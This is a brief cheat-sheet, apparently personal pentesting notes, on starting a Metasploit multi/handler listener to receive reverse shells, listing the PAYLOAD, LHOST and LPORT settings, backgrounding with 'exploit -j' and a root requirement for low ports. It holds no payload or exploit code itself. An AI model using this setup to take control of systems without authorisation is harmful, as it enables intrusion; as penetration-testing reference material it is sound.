# metasploit reverse shell ```use multi/handler``` ```sh set PAYLOAD set LHOST set LPORT exploit -j ``` * multi/handler is backgrounded. Therefore, `session 1` foregrounds the session. * __LPORT under 1024__ user must be root or use sudo